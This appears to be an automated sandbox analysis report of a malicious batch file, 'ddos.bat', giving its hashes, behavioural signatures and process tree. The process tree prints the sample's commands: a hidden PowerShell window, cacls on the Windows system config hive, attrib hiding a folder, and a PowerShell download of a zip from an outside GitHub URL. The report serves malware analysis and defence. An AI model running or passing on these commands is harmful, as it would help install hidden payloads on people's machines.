Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-10-2024 22:17
Static task
static1
Behavioral task
behavioral1
Sample
ddos.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ddos.bat
Resource
win10v2004-20241007-en
General
-
Target
ddos.bat
-
Size
1KB
-
MD5
15ee8aecfc89d8bed8f362cb46e4b8bb
-
SHA1
c39b884897d73006daa07d29264670d181835624
-
SHA256
7af1c25851ef3f66cbca82540d35470de8a364a469d00a013891bd211f56e082
-
SHA512
553a78c7e82669145767747c287244c2e253a938f7379feaf71425e5f4eeedc612157f812d7d723c3edc57d6f534f152714f173e3b10e55331b16b8f741a3b66
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 1588 powershell.exe 2132 powershell.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 2920 cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 1588 powershell.exe 2132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 2920 wrote to memory of 1588 2920 cmd.exe 29 PID 2920 wrote to memory of 1588 2920 cmd.exe 29 PID 2920 wrote to memory of 1588 2920 cmd.exe 29 PID 2920 wrote to memory of 2736 2920 cmd.exe 30 PID 2920 wrote to memory of 2736 2920 cmd.exe 30 PID 2920 wrote to memory of 2736 2920 cmd.exe 30 PID 2920 wrote to memory of 2716 2920 cmd.exe 31 PID 2920 wrote to memory of 2716 2920 cmd.exe 31 PID 2920 wrote to memory of 2716 2920 cmd.exe 31 PID 2920 wrote to memory of 2132 2920 cmd.exe 32 PID 2920 wrote to memory of 2132 2920 cmd.exe 32 PID 2920 wrote to memory of 2132 2920 cmd.exe 32 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2736
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:2716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52697596711e9c9e2f48ea773cafd85ac
SHA11c5534a106c54b8169e7c6edcd2d0936d3271ca7
SHA256860069860dcd11ac57b15fc9fb2d3e791a9ba7ce435ee7544fe706a0054eae70
SHA512199df376e3137072f8717818cf508fa9f4fc4a8be40e17019bfdc660dfd5b2d8fec06f60e98858c091c34250137071b9e625c94c89e3ad50c5641612b8ecfe18